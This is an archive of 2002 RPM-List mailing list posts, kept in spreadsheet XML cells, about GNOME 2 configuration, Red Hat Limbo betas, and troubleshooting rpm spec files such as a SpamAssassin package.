The thing is, I hadn't used gconf-editor yet... and it's exactly what I
feared, old "not so good" memories are coming back : It looks exactly like
a GNOME RegEdit :-/ Oh well.
I still hope that the few missing features I'm still looking for will be
added in the next 2.0.x releases, like for example being able to have the
panel always under *all* other windows (if you know how to do that, I'm
really interested! ;-)).Cheers,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</si>
  <si>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I've noticed that the theories on the interconnection
between the latest RH releases is lagging a bit.  In
the interests of a fun discussion, anyone have any
ideas?So here's some conspiracy bits to lay out.  Can anyone
fit the pieces together?"Chesapeake Skipjacks" are a class of boats:
http://carloulton.htmlplanet.com/SKIPJACK/boat.htmlAlso note: "They were developed from the lines of the
Chesapeake Bay Log Canoe, the Brogan, and the famous
Clipper Ships." Clipper Ships (Chips)?  Chesapeake College's mascot(s) is(are) the Skipjacks:
http://www.chesapeake.edu/athletics/athletics_side.asp?sport=6This guy owns a "Chesapeake 32" named "Valhalla":
http://www.matella.com/chesapeake1.htmNow, Valhalla -&gt; Limbo seems a little clearer, both
being afterlife-ish concepts of roughly Norse
extraction.Anyone else?.Doug__________________________________________________
Do You Yahoo!?
HotJobs - Search Thousands of New Jobs
http://www.hotjobs.com_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">I find Gnome2 with Red Hat's Limbo to be quite nice.On Thu, 2002-08-08 at 10:30, Matthias Saou wrote:
&gt; Once upon a time, Brian wrote :
&gt; 
&gt; &gt;     I'm using the Gnome2 set of rpms through apt.  It's very good, though
&gt; &gt;     it's shy of converted apps and such.  I really like it; it's the
&gt; &gt;     simple, stable competitor to Windows(tm) that we all need/want/etc.
&gt; 
&gt; Well, you can already remove me from your "all" statement... :-( I've been
&gt; using GNOME 2 at home ever since it made it into Rawhide, and I must say
&gt; that I feel really uncomfortable with it : Things are just too limited and
&gt; you're now asked to stick with the defaults. I've already switched back
&gt; from Metacity to Sawfish, but for the main GNOME stuff like the panel and
&gt; the control center... there are now too few options for "advanced users"
&gt; like me who like to be able to configure as much as possible.
&gt; 
&gt; Let's see how it evolves... but the GNOME guys who decide seem to want to
&gt; change everything to be as simple and limited as possible to not confuse
&gt; the basic (lower then average IMHO) user. So in the meantime, I stick with
&gt; GNOME 1.4 and I'm quite happy with how it performs in my daily tasks
&gt; although it doesn't have the nice look of anti-aliased fonts (I mainly use
&gt; and LCD screen and projector anyway).
&gt; 
&gt; &gt;     Problem is, though, Pango (a package that deals with international
&gt; &gt;     font rendering) hasn't been made available to the apt repository on
&gt; &gt;     Sunmore.net.
&gt; 
&gt; Maybe try grabbing it from the latest Red Hat Linux beta (Limbo) or from
&gt; Rawhide...
&gt; 
&gt; &gt;     Who the heck do I contact for this, anyway?
&gt; 
&gt; Not me, sorry!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http://lists.freshrpms.net/mailman/listinfo/rpm-list_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 2002-08-08 at 12:15, Matthias Saou wrote:
&gt; I didn't say it wasn't nice! It looks great, but... it clearly doesn't suit
&gt; my needs or tastes :
&gt; - I'm a sloppy focus addict... and I configured sawfish to behave exactly
&gt; like I want for window focus and delayed raising as well as separating
&gt; windows per desktop or placing transient windows. For all these reasons and
&gt; many others, Metacity that Havoc Pennington wants to keep basic and simple
&gt; is right out! :-(One of the things you need to understand with gnome2 is that while they
did simplify a lot of things, most of the configuration options people
found very useful are still available through gconf. Learn to love
gconf-editor ;) -- metacity can have sloppy focus (Desktop Preferences
-&gt; Window Focus -- there's actually GUI for that), and the delay until
raising (and whether it raises) can be set in gconf-editor,
/apps/metacity/general/auto_raise and auto_raise_delay&gt; - I like the ability to have sliding panels that auto-hide in GNOME... but
&gt; with the new panel you can't specify the amount of pixels by which it
&gt; sticks out anymore :-(/apps/panel/global/panel_minimized_size&gt; 
&gt; These are only two examples, I could find more : Each time I use GNOME 2
&gt; I'm quickly irritated by a little something that suited me better in 1.4.Well, it definitely is not the same as 1.4. Some people will always like
gnome 1 better. Whatever suits your needs.&gt; I'm not saying that GNOME 2 is bad, poorly conceived or ugly. It'll
&gt; probably even get very good critics from reviewers that are used to Windows
&gt; or MacOS X, where I also feel "limited" myself.I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gconf-editor.
Personally, I'm fine with that, because I don't find gconf-editor hard
to use :)Julian
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">I think this sort of discussion would be better on a GNOME list... I hate to
complain, but this thread has been going on for several days. I don't really 
mind deleting the messages every time, but there's really no reason for it 
on this list. 
__________________________________________________
Do You Yahoo!?
HotJobs - Search Thousands of New Jobs
http://www.hotjobs.com_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Me too, I prefer the close button in the upper left corner as well.  I
found nice border themes Iridium-Blueish-0.3.tar.gz and
Iridium-Greenish-0.3.tar.gz but forgot where I got them from.If you can find, they're worth a try.LanceOn Fri, 2002-08-09 at 10:30, Matthias Saou wrote:
&gt; Once upon a time, Harri wrote :
&gt; 
&gt; &gt; My personal problem with gnome2 is that all the wm (metacity) themes are
&gt; &gt; windows themes with different colours. :) There's one pretty
&gt; &gt; nice-looking one from the place where you can get "stylish" theme..
&gt; &gt; forgot where, have to look it up.
&gt; 
&gt; I've found some nice Metacity themes, including the Crux one I like so much
&gt; on www.sunshineinabag.co.uk. They've also got nice gtk2 themes and really
&gt; cool gdm ones. My only regret here is that I liked the ability of choosing
&gt; where the buttons were placed in the sawfish Crux theme, as I prefer the
&gt; close button in the upper left corner :-/
&gt; 
&gt; Matthias
&gt; 
&gt; -- 
&gt; Matthias Saou                                World Trade Center
&gt; -------------                                Edificio Norte 4 Planta
&gt; System and Network Engineer                  08039 Barcelona, Spain
&gt; Electronic Group Interactive                 Phone : +34 936 00 23 23
&gt; 
&gt; _______________________________________________
&gt; RPM-List mailing list 
&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Is there a way to find all files on the box that do not belong to any rpm
package?Thanks
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 9 Aug 2002 12:08:59 -0700 (PDT), Joshua Daniel Franklin  wrote:&gt; I think this sort of discussion would be better on a GNOME list... I hate to
&gt; complain, but this thread has been going on for several days. I don't really 
&gt; mind deleting the messages every time, but there's really no reason for it 
&gt; on this list.     Yeah, I'spose.------------------------------------------------------------------------
Brian FahrlÃ¤nder              Linux Zealot, Conservative, and Technomad
Evansville, IN                    My Voyage: http://www.CounterMoon.com
ICQ  5119262
------------------------------------------------------------------------
"Waddling" into the mainstream?  I suppose...
http://www.usatoday.com/usatonline/20020805/4333165s.htm_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">
Matthias Saou wrote:&gt;Once upon a time, Julian wrote :
&gt;
&gt;  
&gt;
&gt;&gt;One of the things you need to understand with gnome2 is that while they
&gt;&gt;did simplify a lot of things, most of the configuration options people
&gt;&gt;found very useful are still available through gconf. Learn to love
&gt;&gt;gconf-editor ;) -- metacity can have sloppy focus (Desktop Preferences
&gt;&gt;-&gt; Window Focus -- there's actually GUI for that), and the delay until
&gt;&gt;raising (and whether it raises) can be set in gconf-editor,
&gt;&gt;/apps/metacity/general/auto_raise and auto_raise_delay
&gt;&gt;    
&gt;&gt;
&gt;
&gt;Well, I stand corrected :-)
&gt;The thing is, I hadn't used gconf-editor yet... and it's exactly what I
&gt;feared, old "not so good" memories are coming back : It looks exactly like
&gt;a GNOME RegEdit :-/ Oh well.
&gt;I still hope that the few missing features I'm still looking for will be
&gt;added in the next 2.0.x releases, like for example being able to have the
&gt;panel always under *all* other windows (if you know how to do that, I'm
&gt;really interested! ;-)).
&gt;  
&gt;
More like Apple's implementation - the Gconf2 files are bog-standard 
XML, should you feel tempted to edit it by hand :)There are some possibilities that using standardised configuration tools 
provide: the ability to centrally manage a large number of computers - 
something like Windows' group policy. Although that would require other 
applications to use GConf as well .Haven't installed Limbo beta2 myself - been sidetracked by work; the 
fact that the computer I'm installing it on is connected to a dodgy USB 
ADSL modem that requires heavy kernel patching means that I would have 
to do it over a weekend - but I don't think Red Hat currently does it 
for its config tools.Regards,Michel__________________________________________________
Do You Yahoo!?
Everything you'll ever need on one web page
from News and Sport to Email and Music Charts
http://uk.my.yahoo.com
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">..it's a major release and supports now SGI's FAM technology
(see http://www.oss.sgi.com/projects/fam/), meaning gentoo will
now be aware of changes made to the directories it's viewing.More details see emils ChangeLog on 
https://sourceforge.net/project/shownotes.php?release_id=103492--
regards from Germany
                   Matthias_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">...see subject-- 
regards from Germany
                   Matthias_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">I am new to linux.Is that an easy way to identify which rpm / rpms to which hardware
devices or software packages?Regards,
    Yen Ho
(Technical Support)
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">How do I install / add an additional service port to the system which
can be access via Microsoft ODBC driver?Regards,
    Yen Ho
(Technical Support)
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Yen wrote :&gt; How do I install / add an additional service port to the system which
&gt; can be access via Microsoft ODBC driver?I honestly have no idea, and this is probably not the best list to expect
an answer as it is supposed to discuss rpm packages/packaging matters.If you're using Red Hat Linux 7.3, you should try this list :
https://listman.redhat.com/mailman/listinfo/valhalla-listMatthias--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</si>
  <si>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 Matthias..&gt; ..it's a major release and supports now SGI's FAM technology..requires currently some changes for the spec because the dep to fam
2.6.7-6.
For compiling fam.h (fam-evel) is required too.-- 
regards from Germany
                   Matthias_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Matthias wrote :&gt; Hi, Matthias..
&gt; 
&gt; &gt; ..it's a major release and supports now SGI's FAM technology
&gt; 
&gt; ..requires currently some changes for the spec because the dep to fam
&gt; 2.6.7-6.
&gt; For compiling fam.h (fam-evel) is required too.Indeed, I had repackaged a first version, but without fam support (not
released). I'll release the package with fam support right now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</si>
  <si>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as root, 'service xinetd reload'HTH,MichelMatthias Haase wrote:&gt;Hi, Matthias...
&gt;
&gt;  
&gt;
&gt;&gt;Indeed, I had repackaged a first version, but without fam support (not
&gt;&gt;released). I'll release the package with fam support right now ;-)
&gt;&gt;    
&gt;&gt;
&gt;
&gt;...your package doesn't require a special buildlevel for the installed fam
&gt;rpm, it checks for libfam.* libs.
&gt;In result, I could do an upgrade of gentoo for two older boxes here in our
&gt;company - still RH 7.1.
&gt;I don't know about the 'cleanless' of this (compiling mostly the latest
&gt;sources on our devel box myself).
&gt;
&gt;Because non default fam rpm for RH 7.1 exists, I have to use the
&gt;fam-2.6.4-11.i386.rpm for RH 7.2 instead.
&gt;No probs. But the scripts inside this rpm doesn't restart xinetd on the
&gt;fly, I have currently started fam by hand.
&gt;
&gt;The sgi_fam script exists in /etc/xinetd.d, so I hope, that fam is up and
&gt;running on the next boot too.
&gt;
&gt;  
&gt;
__________________________________________________
Do You Yahoo!?
Everything you'll ever need on one web page
from News and Sport to Email and Music Charts
http://uk.my.yahoo.com
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Michel Alexandre Salim (salimma1@yahoo.co.uk) wrote*:
&gt;Haven't installed Limbo beta2 myself - been sidetracked by work; theLimbo beta2 ? I'm running Limbo 7.3.92 with kernel 4.2.18-5.58, is what I am running
an "older" version of the Limbo beta, it is it "the" limbo beta?btw, it does have that gconf editor included.I dumped the RPMS from the Limbo cd's 1 to 3 onto a drive, ran a few scripts, edited
sources.list (rpm file:///path-to-files/RPMS.os os [I think]) and used "apt-get
dist-upgrade", worked like a charm. The real RH installer couldnot handle an upgrade
for me, it froze "searching for packages".--
That's "angle" as in geometry._______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Aug 12, 2002 at 11:06:18PM +0000,  Angles  Puglisi wrote:
&gt; Michel Alexandre Salim (salimma1@yahoo.co.uk) wrote*:
&gt; Limbo beta2 ? I'm running Limbo 7.3.92 with kernel 4.2.18-5.58, is what I am running
&gt; an "older" version of the Limbo beta, it is it "the" limbo beta?The current version of the Limbo beta is 7.3.93 (yeah, they should
have renamed it, but they didn't). It's in the same
redhat/linux/beta/limbo directory on the ftp servers. Just check the
redhat-release package to find out which version is on the server. 
Looking at ftp.redhat.com, the current one is redhat-release-7.3.93-2.If you're using GNOME2 from the beta, I'd upgrade as there were some
important bugfixes since the first beta. The only thing to watch out
for is that Limbo2 switched gcc to 3.2, which is once again
incompatible with the previous gcc (v3.1 shipped in Limbo1).gary_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Mark wrote :&gt; I'm just playing with gnuboy (game boy emulator) as its fairly simple
&gt; and small.
&gt; I'm having a few problems with the %docs macro.
&gt; After reading thru maximum rpm and the rpm docs, I'm still stuck on one
&gt; thing, in the source for gnuboy there is a directory called docs, that
&gt; contains, well the docs.
&gt; 
&gt; I'm not sure what to pass to the %docs macro?
&gt; I originally tried:
&gt; %doc CHANGES  CONFIG  CREDITS  FAQ  HACKING  LIBERTY  README.old  
&gt; 
&gt; and it moans about missing files, would I have to put a few lines in the
&gt; %build macro, just before configure to move the docs out of that
&gt; directory and into the build root?
&gt; 
&gt; ie: mv docs/* ../Actually, I've already rebuild gnuboy, I just had forgotten to commit the
spec file, which is now done :http://freshrpms.net/builds/gnuboy/gnuboy.specBasically, %doc is used to put files in %docdir (default to
/usr/share/docs/%{name}-%{version}/ and the listed files with relative
paths (i.e. that don't start with a "/") are relative to the %{builddir}
(the uncompressed source usually). So either you can choose to have a
"docs" directory inside %{_docdir} by putting :
%doc docs
(or, totally equivalent, the latter just reminding it's a directory)
%doc docs/
Or you can put all files that are in docs/ directly in %{_docdir} :
%doc docs/*Try both, poke around, and you should catch the difference if it's not
already clear for you.
You can also mark any file from the %{buildroot} as documentation (will be
listed when using "-qd" to query the package's docs) by using %doc with
absolute filenames, for example :
%doc %{_datadir}/foo-game/manual
(this is /usr/share/foo-game/manual, an absolute file)
Also, for the packager's convenience, all files in /usr/share/man (aka
%{_mandir}) are automatically tagged as %doc.&gt; Also one more thing, whats the best way to work out the dependencies?
&gt; as for example with gnuboy, all hte docs and the website says is it
&gt; needs SDL.
&gt; 
&gt; Do I set a Requires: SDL &gt;= 1.2 (as my system uses SDL-1.2.4-5) or just
&gt; put Requires: SDL.Build the package once and see if it checks for a specific version, or read
the installation notes. Often you'll see "checking for SDL &gt;= 1.2.0" for
example when running configure, then it's best to also make the package
depend on that version.&gt; One more quick question, I'm used to compiling source code no problem
&gt; (cannot program, but stumble through), whats the best way for finding
&gt; out what RPMS are needed for the Requires &amp; BuildRequires macros?
&gt; apart from read all the docs and websites info.Well, read the docs indeed :-) You can also compile the package once
without those fields and see what the configure script is checking for
(basically, the libs and versions you'll need to add to the BuildRequires:)
then once the package is built, query the automatic dependencies that rpm
put into it. You'll see for instance if the binaries/libs from the package
need SDL, gtk+  etc. Then add those "Requires:" and rebuild a final version
of the package.
Often you can omit some dependencies, for example if a program is checking
for glib, gtk+, gdk-pixbuf and gnome libraries when being compiled,
BuildRequires: gnome-libs-devel
Requires: gnome-libs
will be enough since they already depend on the "lower level" libs that are
glib, gtk+ and gdk-pixbuf.&gt; Once again sorry to bother you with this, but I figured you were the
&gt; best one to ask.Well, this is typically the type of information interesting to share with
others, so I'll copy this answer to the rpm-list hoping some people will
appreciate :-)&gt; p.s freshrpms rocks .. creep..creep!Thanks ;-)Matthias-- 
Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-5
Load : 0.29 0.20 0.32, AC on-line, battery charging: 100% (8:29)_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 2002-08-13 at 07:25, Gary Peck wrote:
&gt; On Mon, Aug 12, 2002 at 11:06:18PM +0000,  Angles  Puglisi wrote:
&gt; &gt; Michel Alexandre Salim (salimma1@yahoo.co.uk) wrote*:
&gt; &gt; Limbo beta2 ? I'm running Limbo 7.3.92 with kernel 4.2.18-5.58, is what I am running
&gt; &gt; an "older" version of the Limbo beta, it is it "the" limbo beta?
&gt; 
&gt; The current version of the Limbo beta is 7.3.93 (yeah, they should
&gt; have renamed it, but they didn't). It's in the same
&gt; redhat/linux/beta/limbo directory on the ftp servers. Just check the
&gt; redhat-release package to find out which version is on the server. 
&gt; Looking at ftp.redhat.com, the current one is redhat-release-7.3.93-2.
&gt; 
&gt; If you're using GNOME2 from the beta, I'd upgrade as there were some
&gt; important bugfixes since the first beta. The only thing to watch out
&gt; for is that Limbo2 switched gcc to 3.2, which is once again
&gt; incompatible with the previous gcc (v3.1 shipped in Limbo1).Eeeek... I hope they aren't intending to release a new RH with a new gcc
which hasn't yet been released (again). Bad enough the first time, and
I'm sure it gave RedHat a lot of embarrassment.FWIW, I've yet to compile apt on the gcc 3.2 snapshot in RawHide - apt's
C++ makes several rather poor assumptions on what iterators are, and in
addition doesn't use namespaces at all.For non-C++ folk, this basically means it needs porting. I've got a
reasonable way along, now, and I'll send a suitable patch to Connectiva
or somewhere when I succeed - I can't find anything on Connectiva's site
itself for this.In addition, the rpmlib stuff has changed slightly - I've not really
started on this, but it's mainly just arguments added. The rpmlib
documentation seems somewhat poor, though, unless I've missed it.Dave.
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Dave wrote :&gt; Eeeek... I hope they aren't intending to release a new RH with a new gcc
&gt; which hasn't yet been released (again). Bad enough the first time, and
&gt; I'm sure it gave RedHat a lot of embarrassment.Not really, it should have given more embarrassment to sloppy C++
programmers although they often were the ones bashing on gcc 2.96...&gt; FWIW, I've yet to compile apt on the gcc 3.2 snapshot in RawHide - apt's
&gt; C++ makes several rather poor assumptions on what iterators are, and in
&gt; addition doesn't use namespaces at all.
&gt; 
&gt; For non-C++ folk, this basically means it needs porting. I've got a
&gt; reasonable way along, now, and I'll send a suitable patch to Connectiva
&gt; or somewhere when I succeed - I can't find anything on Connectiva's site
&gt; itself for this.There are already patches for this, look at the Conectiva apt-list
archives, you should find them there. Also, apt 0.5 is being actively
developed and already contains enough fixes to be compiled on Limbo with
gcc 3.2.&gt; In addition, the rpmlib stuff has changed slightly - I've not really
&gt; started on this, but it's mainly just arguments added. The rpmlib
&gt; documentation seems somewhat poor, though, unless I've missed it.You can still use an apt package compiled on Red Hat Linux 7.3 as long as
you install the "rpm404" package for compatibility. That's what I'm doing
currently on my home Rawhide system.Matthias--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</si>
  <si>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Hi,	I'm no longer able to play encrypted dvd's using the xine rpm from freshrpms. 
I think it was about a week ago when I last rented some dvd's, worked just 
fine, but apparently since the latest xine update on freshrpms, it won't 
anymore. 
The output is :input_dvd: Sorry, this plugin doesn't play encrypted DVDs. The legal status
           of CSS decryption is unclear and we can't provide such code.
           Please check http://dvd.sf.net for more information.I'm pretty sure it worked with the previous freshrpms release... Any way of 
rolling back updates ?Nick Verhaegen_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Can someone tell me what I am doing wrong? it's like make doesn't take the
PREFIX override... It's crazy. I don't get it...
OS: TurboLinux6 rmp3.0.6 make 3.79.1I just don't get this. It should work...---%define real_name Mail-SpamAssassin
%define real_version 2.31########################################################################
# Package Information
########################################################################
Name:         SpamAssassin
Version:      2.31
Summary:      SpamAssassin - A perl-based spam filter
URL:          http://www.spamassassin.org
Group:        Networking/Mail
License:      Artistic
Release:      1########################################################################
# Sources/Patches
########################################################################
Source0: http://spamassassin.org/devel/%{real_name}-%{real_version}.tar.gz########################################################################
# Build Configuration
########################################################################
BuildRoot:          %{_builddir}/%{real_name}-%{real_version}-root
BuildArchitectures: i586########################################################################
# Package Description
########################################################################
%description
    SpamAssassin provides you with a way to reduce if not completely
eliminate
    Unsolicited Commercial Email (SPAM) from your incoming email.  It can
    be invoked by a MDA such as sendmail or postfix, or can be called from
    a procmail script, .forward file, etc.  It uses a genetic-algorithm
    evolved scoring system to identify messages which look spammy, then
    adds headers to the message so they can be filtered by the user's mail
    reading software.  This distribution includes the spamd/spamc components
    which create a server that considerably speeds processing of mail.%prep
%setup -q -n %{real_name}-%{real_version}########################################################################
# Compilation/Installation Instructions (use macros/switches if possible)
########################################################################
%build
   %{__perl} Makefile.PL LOCAL_RULES_DIR=/etc/spamassassin
INSTALLDIRS=vendor PREFIX=%{_prefix}
   make OPTIMIZE="$RPM_OPT_FLAGS" PREFIX=%{_prefix}
%install
   rm -rf $RPM_BUILD_ROOT
   %makeinstall PREFIX=%{buildroot}%{_prefix} \
                INSTALLMAN1DIR=%{buildroot}%{_mandir}/man1 \
                INSTALLMAN3DIR=%{buildroot}%{_mandir}/man3 \
                LOCAL_RULES_DIR=%{buildroot}%{_sysconfdir}/spamassassin
   install -m 0711 -D spamd/redhat-rc-script.sh
%{buildroot}/etc/init.d/spamassassind
%clean
   rm -rf $RPM_BUILD_ROOT########################################################################
# RPM file inclusion section (see CRUX guidelines)
########################################################################
%files
%defattr(-,root,root)
%attr(0711,root,root) /etc/init.d/spamassassind
%attr(0644,root,root) %config(noreplace) /etc/spamassassin/*
%attr(0755,root,root) %dir %{_datadir}/spamassassin
%attr(0755,root,root) %{_bindir}/*
%attr(0644,root,root) %{_datadir}/spamassassin/*
%attr(-,root,root) %{_libdir}/*########################################################################
# Changelog - Keep it short and simple
########################################################################
%changelog
* Sun Apr 28 2002 Victor 
- Initial Release
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 2002-08-14 at 07:16, Victor wrote:
&gt; Can someone tell me what I am doing wrong? it's like make doesn't take the
&gt; PREFIX override... It's crazy. I don't get it...
&gt; OS: TurboLinux6 rmp3.0.6 make 3.79.1I'm decoding this to mean:"This spec file installs in the system, rather than in the build root,
even though I am passing the relevant overrides to make. It is as if the
Makefile does not allow overrides, or does not have those variables."I note that:1) It's one of those Makefile.PL things.
2) While I know that Makefiles generated by a ./configure generated in
turn by a later version of auto* do support the technique you're trying,
I know nothing about what the Perl MakeMaker (or whatever it is)
supports.The general solution for cases like this is to install manually (Try
make -n and see what it does). I think that Perl's installer system
might support an installation root, though I've blissfully no idea how
to operate it.I suggest finding a small Perl module SRPM and looking at the spec file
to see how RedHat (or Turbo, or PLD, although RedHat generally know
*all* the tricks) do it.Dave.
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-08-12 at 06:32, Matthias Saou wrote:
&gt; Once upon a time, Yen wrote :
&gt; 
&gt; &gt; How do I install / add an additional service port to the system which
&gt; &gt; can be access via Microsoft ODBC driver?
&gt; 
&gt; I honestly have no idea, and this is probably not the best list to expect
&gt; an answer as it is supposed to discuss rpm packages/packaging matters.
&gt; 
&gt; If you're using Red Hat Linux 7.3, you should try this list :
&gt; https://listman.redhat.com/mailman/listinfo/valhalla-listI had to take a stab at answering that for a paying customer yesterday.
I _think_ you need to install postgreql-odbc and its' dependencies. Then
probably a bit of configuration to open a port to the network. But
Matthias is right, this is not the right place for this question.To bring things back on topic, I was practicing my "rpmbuild'n skillz"
and made an rpm with some simple software tools to drive my DVD+RW
burner. No GUI frontend, but it works just fine from the command line. I
even used it to burn a bootable DVD version of Red Hat 7.3.ftp://people.redhat.com/ckloiber/dvd+rw-tools-0.1.src.rpm-- 
Chris Kloiber_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">spamassassin-2.31-15.src.rpm is in RawHide. Take a look at how it's
.spec file fixes the problem(s) you are encountering.On Wed, 2002-08-14 at 02:16, Victor wrote:
&gt; Can someone tell me what I am doing wrong? it's like make doesn't take the
&gt; PREFIX override... It's crazy. I don't get it...
&gt; OS: TurboLinux6 rmp3.0.6 make 3.79.1
&gt; 
&gt; I just don't get this. It should work...
&gt; 
&gt; ---
&gt; 
&gt; %define real_name Mail-SpamAssassin
&gt; %define real_version 2.31
&gt; 
&gt; ########################################################################
&gt; # Package Information
&gt; ########################################################################
&gt; Name:         SpamAssassin
&gt; Version:      2.31
&gt; Summary:      SpamAssassin - A perl-based spam filter
&gt; URL:          http://www.spamassassin.org
&gt; Group:        Networking/Mail
&gt; License:      Artistic
&gt; Release:      1
&gt; 
&gt; ########################################################################
&gt; # Sources/Patches
&gt; ########################################################################
&gt; Source0: http://spamassassin.org/devel/%{real_name}-%{real_version}.tar.gz
&gt; 
&gt; ########################################################################
&gt; # Build Configuration
&gt; ########################################################################
&gt; BuildRoot:          %{_builddir}/%{real_name}-%{real_version}-root
&gt; BuildArchitectures: i586
&gt; 
&gt; ########################################################################
&gt; # Package Description
&gt; ########################################################################
&gt; %description
&gt;     SpamAssassin provides you with a way to reduce if not completely
&gt; eliminate
&gt;     Unsolicited Commercial Email (SPAM) from your incoming email.  It can
&gt;     be invoked by a MDA such as sendmail or postfix, or can be called from
&gt;     a procmail script, .forward file, etc.  It uses a genetic-algorithm
&gt;     evolved scoring system to identify messages which look spammy, then
&gt;     adds headers to the message so they can be filtered by the user's mail
&gt;     reading software.  This distribution includes the spamd/spamc components
&gt;     which create a server that considerably speeds processing of mail.
&gt; 
&gt; %prep
&gt; %setup -q -n %{real_name}-%{real_version}
&gt; 
&gt; ########################################################################
&gt; # Compilation/Installation Instructions (use macros/switches if possible)
&gt; ########################################################################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&gt;    install -m 0711 -D spamd/redhat-rc-script.sh
&gt; %{buildroot}/etc/init.d/spamassassind
&gt; %clean
&gt;    rm -rf $RPM_BUILD_ROOT
&gt; 
&gt; ########################################################################
&gt; # RPM file inclusion section (see CRUX guidelines)
&gt; ########################################################################
&gt; %files
&gt; %defattr(-,root,root)
&gt; %attr(0711,root,root) /etc/init.d/spamassassind
&gt; %attr(0644,root,root) %config(noreplace) /etc/spamassassin/*
&gt; %attr(0755,root,root) %dir %{_datadir}/spamassassin
&gt; %attr(0755,root,root) %{_bindir}/*
&gt; %attr(0644,root,root) %{_datadir}/spamassassin/*
&gt; %attr(-,root,root) %{_libdir}/*
&gt; 
&gt; ########################################################################
&gt; # Changelog - Keep it short and simple
&gt; ########################################################################
&gt; %changelog
&gt; * Sun Apr 28 2002 Victor 
&gt; - Initial Release
&gt; 
&gt; 
&gt; _______________________________________________
&gt; RPM-List mailing list 
&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
-- 
Chris Kloiber_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Victor wrote :&gt; Can someone tell me what I am doing wrong? it's like make doesn't take
&gt; the PREFIX override... It's crazy. I don't get it...
&gt; OS: TurboLinux6 rmp3.0.6 make 3.79.1
&gt; 
&gt; I just don't get this. It should work...
&gt; 
[...]
&gt;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[...]Well, first you need to look at the Makefile.PL to see if it uses the
PREFIX you're trying to pass to it or not. Maybe you'll need to "override"
other paths when doing the "make".
Second, the "%makeinstall" macro automatically overrides many common values
like "prefix=" or "datadir=", so it's completely redundant with the
"PREFIX=" you're passing to it. Take a look at the "Makefile" you have at
that point to see how the "install" target is, and what it uses.Last, as Chris suggested, you can take a look at an existing package, like
the one in Rawhide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</si>
  <si>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Once upon a time, Nick wrote :&gt; 	I'm no longer able to play encrypted dvd's using the xine rpm from
&gt; 	freshrpms. 
&gt; I think it was about a week ago when I last rented some dvd's, worked
&gt; just fine, but apparently since the latest xine update on freshrpms, it
&gt; won't anymore. 
&gt; The output is :
&gt; 
&gt; input_dvd: Sorry, this plugin doesn't play encrypted DVDs. The legal
&gt; status
&gt;            of CSS decryption is unclear and we can't provide such code.
&gt;            Please check http://dvd.sf.net for more information.
&gt; 
&gt; I'm pretty sure it worked with the previous freshrpms release... Any way
&gt; of rolling back updates ?If you get this message, it means that you're using the "DVD" button, which
is the default DVD plugin and doesn't support decryption. You should either
use the "d4d" one (no menus) or "d5d" (with menus).Matthias--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</si>
  <si>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Once upon a time, Chris wrote :&gt; To bring things back on topic, I was practicing my "rpmbuild'n skillz"
&gt; and made an rpm with some simple software tools to drive my DVD+RW
&gt; burner. No GUI frontend, but it works just fine from the command line. I
&gt; even used it to burn a bootable DVD version of Red Hat 7.3.
&gt; 
